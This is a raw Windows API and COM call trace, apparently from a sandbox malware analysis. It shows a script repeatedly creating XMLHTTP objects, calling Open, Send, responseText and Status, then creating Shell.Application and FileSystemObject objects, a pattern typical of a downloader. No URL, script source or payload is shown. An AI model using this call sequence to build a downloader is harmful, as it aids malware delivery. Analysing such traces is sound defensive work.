	[0240.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0240.595] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0240.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0240.595] longjmp () 
	[0240.595] longjmp () 
	[0240.595] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0240.595] SysStringLen (param_1=0x0) returned 0x0
	[0240.595] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0240.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0240.595] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0240.595] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0240.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0240.595] ??2@YAPEAX_K@Z () returned 0x62f310
	[0240.595] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0240.595] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0240.595] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0240.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0240.595] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0240.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0240.595] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0240.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0240.596] longjmp () 
	[0240.596] longjmp () 
	[0240.596] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0240.596] SysStringLen (param_1=0x0) returned 0x0
	[0240.596] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0240.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0240.596] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0240.596] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0240.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0240.596] ??2@YAPEAX_K@Z () returned 0x62f330
	[0240.596] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0240.596] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0240.596] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0240.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0240.596] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0240.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0240.596] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0240.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0240.596] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0240.597] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0240.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0241.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0241.398] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0241.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0241.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0241.398] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0241.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0241.398] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0241.398] SysStringLen (param_1=0x0) returned 0x0
	[0241.399] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0241.399] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0241.399] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0241.399] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0241.399] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0241.399] ??2@YAPEAX_K@Z () returned 0x62f350
	[0241.399] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0241.399] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0241.399] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0241.399] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0241.399] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0241.399] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0241.399] SysStringLen (param_1=0x0) returned 0x0
	[0241.399] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0241.402] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0241.402] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0241.402] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0241.402] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0241.402] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0241.402] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0241.654] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0241.655] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0241.655] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0241.656] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0241.656] SysStringLen (param_1=0x0) returned 0x0
	[0241.656] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0241.656] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0241.656] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0241.656] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0241.656] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0241.656] ??2@YAPEAX_K@Z () returned 0x62f330
	[0241.656] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0241.656] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0241.656] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0241.656] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0241.656] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0241.657] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0241.657] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0241.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0241.659] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0241.659] SysStringLen (param_1=0x0) returned 0x0
	[0241.659] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0241.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0241.659] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0241.659] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0241.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0241.659] ??2@YAPEAX_K@Z () returned 0x62f310
	[0241.659] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0241.659] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0241.659] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0241.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0241.659] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
